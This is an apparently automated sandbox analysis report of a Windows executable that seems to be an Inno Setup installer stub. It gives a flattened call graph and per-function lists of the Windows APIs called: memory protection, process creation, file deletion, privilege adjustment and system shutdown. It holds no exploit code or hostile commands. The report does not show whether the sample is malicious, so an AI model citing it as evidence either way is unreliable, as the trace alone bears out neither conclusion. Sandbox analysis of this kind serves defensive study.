6322->6320 6322->6321 6324 402c08 6327 402c82 6324->6327 6328 402c19 6324->6328 6325 402c56 RtlUnwind 6326 403154 4 API calls 6325->6326 6326->6327 6328->6325 6328->6327 6331 402b28 6328->6331 6332 402b31 RaiseException 6331->6332 6333 402b47 6331->6333 6332->6333 6333->6325 6334 408c10 6335 408c17 6334->6335 6336 403198 4 API calls 6335->6336 6343 408cb1 6336->6343 6337 408cdc 6338 4031b8 4 API calls 6337->6338 6340 408d69 6338->6340 6339 408cc8 6342 4032fc 4 API calls 6339->6342 6341 403278 4 API calls 6341->6343 6342->6337 6343->6337 6343->6339 6343->6341 6344 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6343->6344 6344->6343 6345 40a011 6346 40a036 6345->6346 6347 407918 InterlockedExchange 6346->6347 6349 40a060 6347->6349 6348 40a070 6355 4076ac SetEndOfFile 6348->6355 6349->6348 6350 409aa0 4 API calls 6349->6350 6350->6348 6352 40a08c 6353 4025ac 4 API calls 6352->6353 6354 40a0c3 6353->6354 6356 4076c3 6355->6356 6357 4076bc 6355->6357 6356->6352 6358 40748c 21 API calls 6357->6358 6358->6356 6770 409916 6772 409918 6770->6772 6771 40993a 6772->6771 6773 409956 CallWindowProcA 6772->6773 6773->6771 6086 407017 6087 407008 SetErrorMode 6086->6087 6363 403018 6364 403070 6363->6364 6365 403025 6363->6365 6366 40302a RtlUnwind 6365->6366 6367 40304e 6366->6367 6369 402f78 6367->6369 6370 402be8 6367->6370 6371 402bf1 RaiseException 6370->6371 6372 402c04 6370->6372 6371->6372 6372->6364 6780 409918 6781 40993a 6780->6781 6783 409927 6780->6783 6782 409956 CallWindowProcA 6782->6781 6783->6781 6783->6782 6377 40901e 6378 409010 6377->6378 6379 408fac Wow64RevertWow64FsRedirection 6378->6379 6380 409018 6379->6380 6381 409020 SetLastError 6382 409029 6381->6382 6393 403a28 ReadFile 6394 403a46 6393->6394 6395 403a49 GetLastError 6393->6395 6224 40762c ReadFile 6225 407663 6224->6225 6226 40764c 6224->6226 6227 407652 GetLastError 6226->6227 6228 40765c 6226->6228 6227->6225 6227->6228 6229 40748c 21 API calls 6228->6229 6229->6225 6400 40a02c 6401 409aa0 4 API calls 6400->6401 6402 40a031 6401->6402 6403 40a036 6402->6403 6404 402f24 5 API calls 6402->6404 6405 407918 InterlockedExchange 6403->6405 6404->6403 6406 40a060 6405->6406 6407 40a070 6406->6407 6408 409aa0 4 API calls 6406->6408 6409 4076ac 22 API calls 6407->6409 6408->6407 6410 40a08c 6409->6410 6411 4025ac 4 API calls 6410->6411 6412 40a0c3 6411->6412 6784 40712e 6785 407118 6784->6785 6786 403198 4 API calls 6785->6786 6787 407120 6786->6787 6788 403198 4 API calls 6787->6788 6789 407128 6788->6789 6790 408f30 6793 408dfc 6790->6793 6794 408e05 6793->6794 6795 403198 4 API calls 6794->6795 6796 408e13 6794->6796 6795->6794 6797 403932 6798 403924 6797->6798 6801 40374c 6798->6801 6800 40392c 6802 403766 6801->6802 6803 403759 6801->6803 6802->6800 6803->6802 6804 403779 VariantClear 6803->6804 6804->6800 6035 4075c4 SetFilePointer 6036 4075f7 6035->6036 6037 4075e7 GetLastError 6035->6037 6037->6036 6038 4075f0 6037->6038 6039 40748c 21 API calls 6038->6039 6039->6036 6413 405ac4 6414 405ad4 6413->6414 6415 405acc 6413->6415 6416 405ad2 6415->6416 6417 405adb 6415->6417 6420 405a3c 6416->6420 6418 405930 5 API calls 6417->6418 6418->6414 6421 405a44 6420->6421 6422 405a5e 6421->6422 6423 403154 4 API calls 6421->6423 6424 405a63 6422->6424 6425 405a7a 6422->6425 6423->6421 6426 405930 5 API calls 6424->6426 6427 403154 4 API calls 6425->6427 6428 405a76 6426->6428 6429 405a7f 6427->6429 6431 403154 4 API calls 6428->6431 6430 4059a0 19 API calls 6429->6430 6430->6428 6432 405aa8 6431->6432 6433 403154 4 API calls 6432->6433 6434 405ab6 6433->6434 6434->6414 6435 4076c8 WriteFile 6436 4076e8 6435->6436 6439 4076ef 6435->6439 6437 40748c 21 API calls 6436->6437 6437->6439 6438 407700 6439->6438 6440 4073ec 20 API calls 6439->6440 6440->6438 6441 40a2ca 6450 4096fc 6441->6450 6444 402f24 5 API calls 6445 40a2d4 6444->6445 6446 403198 4 API calls 6445->6446 6447 40a2f3 6446->6447 6448 403198 4 API calls 6447->6448 6449 40a2fb 6448->6449 6459 40569c 6450->6459 6452 409745 6455 403198 4 API calls 6452->6455 6453 409717 6453->6452 6465 40720c 6453->6465 6457 40975a 6455->6457 6456 409735 6458 40973d MessageBoxA 6456->6458 6457->6444 6458->6452 6460 403154 4 API calls 6459->6460 6461 4056a1 6460->6461 6462 4056b9 6461->6462 6463 403154 4 API calls 6461->6463 6462->6453 6464 4056af 6463->6464 6464->6453 6466 40569c 4 API calls 6465->6466 6467 40721b 6466->6467 6468 407221 6467->6468 6471 40722f 6467->6471 6469 40322c 4 API calls 6468->6469 6470 40722d 6469->6470 6470->6456 6472 40724b 6471->6472 6473 40723f 6471->6473 6483 4032b8 6472->6483 6476 4071d0 6473->6476 6477 40322c 4 API calls 6476->6477 6478 4071df 6477->6478 6479 4071fc 6478->6479 6480 406950 CharPrevA 6478->6480 6479->6470 6481 4071eb 6480->6481 6481->6479 6482 4032fc 4 API calls 6481->6482 6482->6479 6484 403278 4 API calls 6483->6484 6485 4032c2 6484->6485 6485->6470 6486 402ccc 6487 402cdd 6486->6487 6491 402cfe 6486->6491 6488 402d88 RtlUnwind 6487->6488 6490 402b28 RaiseException 6487->6490 6487->6491 6489 403154 4 API calls 6488->6489 6489->6491 6492 402d7f 6490->6492 6492->6488 6813 403fcd 6814 403f07 4 API calls 6813->6814 6815 403fd6 6814->6815 6816 403e9c 4 API calls 6815->6816 6817 403fe2 6816->6817 5471 4024d0 5472 4024e4 5471->5472 5473 4024f7 5471->5473 5510 401918 RtlInitializeCriticalSection 5472->5510 5475 402518 5473->5475 5476 40250e RtlEnterCriticalSection 5473->5476 5487 402300 5475->5487 5476->5475 5479 4024ed 5481 402525 5484 402581 5481->5484 5485 402577 RtlLeaveCriticalSection 5481->5485 5483 402531 5483->5481 5517 40215c 5483->5517 5485->5484 5488 402314 5487->5488 5489 402335 5488->5489 5494 4023b8 5488->5494 5490 402344 5489->5490 5531 401b74 5489->5531 5490->5481 5497 401fd4 5490->5497 5494->5490 5495 402455 5494->5495 5534 401d80 5494->5534 5542 401e84 5494->5542 5495->5490 5538 401d00 5495->5538 5498 401fe8 5497->5498 5499 401ffb 5497->5499 5501 401918 4 API calls 5498->5501 5500 402012 RtlEnterCriticalSection 5499->5500 5504 40201c 5499->5504 5500->5504 5502 401fed 5501->5502 5502->5499 5503 401ff1 5502->5503 5509 402052 5503->5509 5504->5509 5624 401ee0 5504->5624 5507 402147 5507->5483 5508 40213d RtlLeaveCriticalSection 5508->5507 5509->5483 5511 40193c RtlEnterCriticalSection 5510->5511 5512 401946 5510->5512 5511->5512 5513 401964 LocalAlloc 5512->5513 5514 40197e 5513->5514 5515 4019c3 RtlLeaveCriticalSection 5514->5515 5516 4019cd 5514->5516 5515->5516 5516->5473 5516->5479 5518 40217a 5517->5518 5519 402175 5517->5519 5521 4021ab RtlEnterCriticalSection 5518->5521 5524 4021b5 5518->5524 5525 40217e 5518->5525 5520 401918 4 API calls 5519->5520 5520->5518 5521->5524 5522 4021c1 5526 4022e3 RtlLeaveCriticalSection 5522->5526 5527 4022ed 5522->5527 5523 402244 5523->5525 5528 401d80 7 API calls 5523->5528 5524->5522 5524->5523 5529 402270 5524->5529 5525->5481 5526->5527 5527->5481 5528->5525 5529->5522 5530 401d00 7 API calls 5529->5530 5530->5522 5532 40215c 9 API calls 5531->5532 5533 401b95 5532->5533 5533->5490 5535 401d89 5534->5535 5536 401d92 5534->5536 5535->5536 5537 401b74 9 API calls 5535->5537 5536->5494 5537->5536 5539 401d4e 5538->5539 5540 401d1e 5538->5540 5539->5540 5547 401c68 5539->5547 5540->5490 5602 401768 5542->5602 5544 401ea6 5544->5494 5545 401e99 5545->5544 5613 401dcc 5545->5613 5548 401c7a 5547->5548 5549 401c9d 5548->5549 5550 401caf 5548->5550 5560 40188c 5549->5560 5551 40188c 3 API calls 5550->5551 5553 401cad 5551->5553 5554 401cc5 5553->5554 5570 401b44 5553->5570 5554->5540 5556 401cd4 5557 401cee 5556->5557 5575 401b98 5556->5575 5580 4013a0 5557->5580 5561 4018b2 5560->5561 5562 40190b 5560->5562 5584 401658 5561->5584 5562->5553 5567 4018e6 5567->5562 5569 4013a0 LocalAlloc 5567->5569 5569->5562 5571 401b61 5570->5571 5572 401b52 5570->5572 5571->5556 5573 401d00 9 API calls 5572->5573 5574 401b5f 5573->5574 5574->5556 5576 401bab 5575->5576 5577 401b9d 5575->5577 5576->5557 5578 401b74 9 API calls 5577->5578 5579 401baa 5578->5579 5579->5557 5581 4013ab 5580->5581 5582 4013c6 5581->5582 5583 4012e4 LocalAlloc 5581->5583 5582->5554 5583->5582 5585 40168f 5584->5585 5586 4016cf 5585->5586 5587 4016a9 VirtualFree 5585->5587 5588 40132c 5586->5588 5587->5585 5589 401348 5588->5589 5596 4012e4 5589->5596 5592 40150c 5595 40153b 5592->5595 5593 401594 5593->5567 5594 401568 VirtualFree 5594->5595 5595->5593 5595->5594 5599 40128c 5596->5599 5600 401298 LocalAlloc 5599->5600 5601 4012aa 5599->5601 5600->5601 5601->5567 5601->5592 5603 401787 5602->5603 5604 40183b 5603->5604 5605 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5603->5605 5606 40132c LocalAlloc 5603->5606 5608 401821 5603->5608 5610 4017d6 5603->5610 5611 4017e7 5604->5611 5620 4015c4 5604->5620 5605->5603 5606->5603 5609 40150c VirtualFree 5608->5609 5609->5611 5612 40150c VirtualFree 5610->5612 5611->5545 5612->5611 5614 401d80 9 API calls 5613->5614 5615 401de0 5614->5615 5616 40132c LocalAlloc 5615->5616 5617 401df0 5616->5617 5618 401df8 5617->5618 5619 401b44 9 API calls 5617->5619 5618->5544 5619->5618 5622 40160a 5620->5622 5621 40163a 5621->5611 5622->5621 5623 401626 VirtualAlloc 5622->5623 5623->5621 5623->5622 5627 401ef0 5624->5627 5625 401f1c 5626 401d00 9 API calls 5625->5626 5629 401f40 5625->5629 5626->5629 5627->5625 5627->5629 5630 401e58 5627->5630 5629->5507 5629->5508 5635 4016d8 5630->5635 5633 401e75 5633->5627 5634 401dcc 9 API calls 5634->5633 5639 4016f4 5635->5639 5636 4016fe 5638 4015c4 VirtualAlloc 5636->5638 5643 40170a 5638->5643 5639->5636 5640 40175b 5639->5640 5641 40132c LocalAlloc 5639->5641 5642 40174f 5639->5642 5645 401430 5639->5645 5640->5633 5640->5634 5641->5639 5644 40150c VirtualFree 5642->5644 5643->5640 5644->5640 5646 40143f VirtualAlloc 5645->5646 5648 40146c 5646->5648 5649 40148f 5646->5649 5650 4012e4 LocalAlloc 5648->5650 5649->5639 5651 401478 5650->5651 5651->5649 5652 40147c VirtualFree 5651->5652 5652->5649 6493 4028d2 6494 4028da 6493->6494 6495 403554 4 API calls 6494->6495 6496 4028ef 6494->6496 6495->6494 6497 4025ac 4 API calls 6496->6497 6498 4028f4 6497->6498 6818 4019d3 6819 4019ba 6818->6819 6820 4019c3 RtlLeaveCriticalSection 6819->6820 6821 4019cd 6819->6821 6820->6821 6040 407fd4 6041 407fe6 6040->6041 6043 407fed 6040->6043 6051 407f10 6041->6051 6044 408021 6043->6044 6045 408015 6043->6045 6046 408017 6043->6046 6047 40804e 6044->6047 6049 407d7c 19 API calls 6044->6049 6065 407e2c 6045->6065 6062 407d7c 6046->6062 6049->6047 6052 407f25 6051->6052 6053 407d7c 19 API calls 6052->6053 6054 407f34 6052->6054 6053->6054 6055 407f6e 6054->6055 6056 407d7c 19 API calls 6054->6056 6057 407f82 6055->6057 6058 407d7c 19 API calls 6055->6058 6056->6055 6061 407fae 6057->6061 6072 407eb8 6057->6072 6058->6057 6061->6043 6075 4058b4 6062->6075 6064 407d9e 6064->6044 6066 405184 19 API calls 6065->6066 6067 407e57 6066->6067 6083 407de4 6067->6083 6069 407e5f 6070 403198 4 API calls 6069->6070 6071 407e74 6070->6071 6071->6044 6073 407ec7 VirtualFree 6072->6073 6074 407ed9 VirtualAlloc 6072->6074 6073->6074 6074->6061 6076 4058c0 6075->6076 6077 405184 19 API calls 6076->6077 6078 4058ed 6077->6078 6079 4031e8 4 API calls 6078->6079 6080 4058f8 6079->6080 6081 403198 4 API calls 6080->6081 6082 40590d 6081->6082 6082->6064 6084 4058b4 19 API calls 6083->6084 6085 407e06 6084->6085 6085->6069 6503 40a0d5 6504 40a105 6503->6504 6505 40a10f CreateWindowExA SetWindowLongA 6504->6505 6506 405184 19 API calls 6505->6506 6507 40a192 6506->6507 6508 4032fc 4 API calls 6507->6508 6509 40a1a0 6508->6509 6510 4032fc 4 API calls 6509->6510 6511 40a1ad 6510->6511 6512 406b7c 5 API calls 6511->6512 6513 40a1b9 6512->6513 6514 4032fc 4 API calls 6513->6514 6515 40a1c2 6514->6515 6516 4099a4 29 API calls 6515->6516 6517 40a1d4 6516->6517 6518 409884 5 API calls 6517->6518 6519 40a1e7 6517->6519 6518->6519 6520 40a220 6519->6520 6521 4094d8 9 API calls 6519->6521 6522 40a239 6520->6522 6525 40a233 RemoveDirectoryA 6520->6525 6521->6520 6523 40a242 73A25CF0 6522->6523 6524 40a24d 6522->6524 6523->6524 6526 40a275 6524->6526 6527 40357c 4 API calls 6524->6527 6525->6522 6528 40a26b 6527->6528 6529 4025ac 4 API calls 6528->6529 6529->6526 6088 40a0e7 6089 40a0eb SetLastError 6088->6089 6120 409648 GetLastError 6089->6120 6092 40a105 6094 40a10f CreateWindowExA SetWindowLongA 6092->6094 6093 402f24 5 API calls 6093->6092 6095 405184 19 API calls 6094->6095 6096 40a192 6095->6096 6097 4032fc 4 API calls 6096->6097 6098 40a1a0 6097->6098 6099 4032fc 4 API calls 6098->6099 6100 40a1ad 6099->6100 6133 406b7c GetCommandLineA 6100->6133 6103 4032fc 4 API calls 6104 40a1c2 6103->6104 6138 4099a4 6104->6138 6107 409884 5 API calls 6108 40a1e7 6107->6108 6109 40a220 6108->6109 6110 40a207 6108->6110 6112 40a239 6109->6112 6115 40a233 RemoveDirectoryA 6109->6115 6154 4094d8 6110->6154 6113 40a242 73A25CF0 6112->6113 6114 40a24d 6112->6114 6113->6114 6116 40a275 6114->6116 6162 40357c 6114->6162 6115->6112 6118 40a26b 6119 4025ac 4 API calls 6118->6119 6119->6116 6121 404c84 19 API calls 6120->6121 6122 40968f 6121->6122 6123 407284 5 API calls 6122->6123 6124 40969f 6123->6124 6125 408da8 4 API calls 6124->6125 6126 4096b4 6125->6126 6127 405880 4 API calls 6126->6127 6128 4096c3 6127->6128 6129 4031b8 4 API calls 6128->6129 6130 4096e2 6129->6130 6131 403198 4 API calls 6130->6131 6132 4096ea 6131->6132 6132->6092 6132->6093 6134 406af0 4 API calls 6133->6134 6135 406ba1 6134->6135 6136 403198 4 API calls 6135->6136 6137 406bbf 6136->6137 6137->6103 6139 4033b4 4 API calls 6138->6139 6140 4099df 6139->6140 6141 409a11 CreateProcessA 6140->6141 6142 409a24 CloseHandle 6141->6142 6143 409a1d 6141->6143 6145 409a2d 6142->6145 6144 409648 21 API calls 6143->6144 6144->6142 6175 409978 6145->6175 6148 409a49 6149 409978 3 API calls 6148->6149 6150 409a4e GetExitCodeProcess CloseHandle 6149->6150 6151 409a6e 6150->6151 6152 403198 4 API calls 6151->6152 6153 409a76 6152->6153 6153->6107 6153->6108 6155 409532 6154->6155 6157 4094eb 6154->6157 6155->6109 6156 4094f3 Sleep 6156->6157 6157->6155 6157->6156 6158 409503 Sleep 6157->6158 6160 40951a GetLastError 6157->6160 6179 408fbc 6157->6179 6158->6157 6160->6155 6161 409524 GetLastError 6160->6161 6161->6155 6161->6157 6163 403591 6162->6163 6164 4035a0 6162->6164 6169 4035d0 6163->6169 6170 40359b 6163->6170 6172 4035b6 6163->6172 6165 4035b1 6164->6165 6166 4035b8 6164->6166 6167 403198 4 API calls 6165->6167 6168 4031b8 4 API calls 6166->6168 6167->6172 6168->6172 6169->6172 6173 40357c 4 API calls 6169->6173 6170->6164 6171 4035ec 6170->6171 6171->6172 6187 403554 6171->6187 6172->6118 6173->6169 6176 40998c PeekMessageA 6175->6176 6177 409980 TranslateMessage DispatchMessageA 6176->6177 6178 40999e MsgWaitForMultipleObjects 6176->6178 6177->6176 6178->6145 6178->6148 6180 408f70 2 API calls 6179->6180 6181 408fd2 6180->6181 6182 408fd6 6181->6182 6183 408ff2 DeleteFileA GetLastError 6181->6183 6182->6157 6184 409010 6183->6184 6185 408fac Wow64RevertWow64FsRedirection 6184->6185 6186 409018 6185->6186 6186->6157 6188 403566 6187->6188 6190 403578 6188->6190 6191 403604 6188->6191 6190->6171 6192 40357c 6191->6192 6193 4035a0 6192->6193 6196 4035b6 6192->6196 6199 4035d0 6192->6199 6200 40359b 6192->6200 6194 4035b1 6193->6194 6195 4035b8 6193->6195 6197 403198 4 API calls 6194->6197 6198 4031b8 4 API calls 6195->6198 6196->6188 6197->6196 6198->6196 6199->6196 6202 40357c 4 API calls 6199->6202 6200->6193 6201 4035ec 6200->6201 6201->6196 6203 403554 4 API calls 6201->6203 6202->6199 6203->6201 6825 402be9 RaiseException 6826 402c04 6825->6826 6536 402af2 6537 402afe 6536->6537 6540 402ed0 6537->6540 6541 403154 4 API calls 6540->6541 6543 402ee0 6541->6543 6542 402b03 6543->6542 6545 402b0c 6543->6545 6546 402b25 6545->6546 6547 402b15 RaiseException 6545->6547 6546->6542 6547->6546 6827 402dfa 6828 402e26 6827->6828 6829 402e0d 6827->6829 6831 402ba4 6829->6831 6832 402bc9 6831->6832 6833 402bad 6831->6833 6832->6828 6834 402bb5 RaiseException 6833->6834 6834->6832 6835 4075fa GetFileSize 6836 407626 6835->6836 6837 407616 GetLastError 6835->6837 6837->6836 6838 40761f 6837->6838 6839 40748c 21 API calls 6838->6839 6839->6836 6840 406ffb 6841 407008 SetErrorMode 6840->6841 6552 403a80 CloseHandle 6553 403a90 6552->6553 6554 403a91 GetLastError 6552->6554 6555 40a282 6557 40a1f4 6555->6557 6556 40a220 6559 40a239 6556->6559 6562 40a233 RemoveDirectoryA 6556->6562 6557->6556 6558 4094d8 9 API calls 6557->6558 6558->6556 6560 40a242 73A25CF0 6559->6560 6561 40a24d 6559->6561 6560->6561 6563 40a275 6561->6563 6564 40357c 4 API calls 6561->6564 6562->6559 6565 40a26b 6564->6565 6566 4025ac 4 API calls 6565->6566 6566->6563 6567 404283 6568 4042c3 6567->6568 6569 403154 4 API calls 6568->6569 6570 404323 6569->6570 6842 404185 6843 4041ff 6842->6843 6844 4041cc 6843->6844 6845 403154 4 API calls 6843->6845 6846 404323 6845->6846 6571 40a287 6572 40a290 6571->6572 6575 40a2bb 6571->6575 6581 409448 6572->6581 6574 40a295 6574->6575 6579 40a2b3 MessageBoxA 6574->6579 6576 403198 4 API calls 6575->6576 6577 40a2f3 6576->6577 6578 403198 4 API calls 6577->6578 6580 40a2fb 6578->6580 6579->6575 6582 409454 GetCurrentProcess OpenProcessToken 6581->6582 6583 4094af ExitWindowsEx 6581->6583 6584 409466 6582->6584 6585 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6582->6585 6583->6584 6584->6574 6585->6583 6585->6584 6586 403e87 6587 403e4c 6586->6587 6588 403e67 6587->6588 6589 403e62 6587->6589 6590 403e7b 6587->6590 6593 403e78 6588->6593 6599 402674 6588->6599 6595 403cc8 6589->6595 6592 402674 4 API calls 6590->6592 6592->6593 6596 403cd6 6595->6596 6597 402674 4 API calls 6596->6597 6598 403ceb 6596->6598 6597->6598 6598->6588 6600 403154 4 API calls 6599->6600 6601 40267a 6600->6601 6601->6593 6606 407e90 6607 407eb8 VirtualFree 6606->6607 6608 407e9d 6607->6608 6855 403991 6856 403983 6855->6856 6857 40374c VariantClear 6856->6857 6858 40398b 6857->6858 6859 405b92 6861 405b94 6859->6861 6860 405bd0 6864 405930 5 API calls 6860->6864 6861->6860 6862 405be7 6861->6862 6863 405bca 6861->6863 6868 404ccc 5 API calls 6862->6868 6863->6860 6865 405c3c 6863->6865 6866 405be3 6864->6866 6867 4059a0 19 API calls 6865->6867 6869 403198 4 API calls 6866->6869 6867->6866 6870 405c10 6868->6870 6871 405c76 6869->6871 6872 4059a0 19 API calls 6870->6872 6872->6866 6611 403e95 6613 403e4c 6611->6613 6612 403e67 6618 403e78 6612->6618 6619 402674 4 API calls 6612->6619 6613->6612 6614 403e62 6613->6614 6615 403e7b 6613->6615 6616 403cc8 4 API calls 6614->6616 6617 402674 4 API calls 6615->6617 6616->6612 6617->6618 6619->6618 6620 403a97 6621 403aac 6620->6621 6622 403bbc GetStdHandle 6621->6622 6623 403b0e CreateFileA 6621->6623 6633 403ab2 6621->6633 6624 403c17 GetLastError 6622->6624 6628 403bba 6622->6628 6623->6624 6625 403b2c 6623->6625 6624->6633 6627 403b3b GetFileSize 6625->6627 6625->6628 6627->6624 6629 403b4e SetFilePointer 6627->6629 6630 403be7 GetFileType 6628->6630 6628->6633 6629->6624 6634 403b6a ReadFile 6629->6634 6632 403c02 CloseHandle 6630->6632 6630->6633 6632->6633 6634->6624 6635 403b8c 6634->6635 6635->6628 6636 403b9f SetFilePointer 6635->6636 6636->6624 6637 403bb0 SetEndOfFile 6636->6637 6637->6624 6637->6628 6891 4011aa 6892 4011ac GetStdHandle 6891->6892 6230 4076ac SetEndOfFile 6231 4076c3 6230->6231 6232 4076bc 6230->6232 6233 40748c 21 API calls 6232->6233 6233->6231 6641 4028ac 6642 402594 4 API calls 6641->6642 6643 4028b6 6642->6643 6644 401ab9 6645 401a96 6644->6645 6646 401aa9 RtlDeleteCriticalSection 6645->6646 6647 401a9f RtlLeaveCriticalSection 6645->6647 6647->6646

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 133 409bb3-409bc0 VirtualProtect 132->133 133->121
                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                          • String ID:
                                                          • API String ID: 2441996862-0
                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                          • API String ID: 3256987805-3653653586
                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                          Control-flow Graph

                                                          APIs
                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0210178C), ref: 0040966C
                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                          • SetWindowLongA.USER32(00020416,000000FC,00409918), ref: 0040A148
                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                          • 73A25CF0.USER32(00020416,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                          • API String ID: 3341979996-3001827809
                                                          • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                          • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                          • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                          • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                          Control-flow Graph

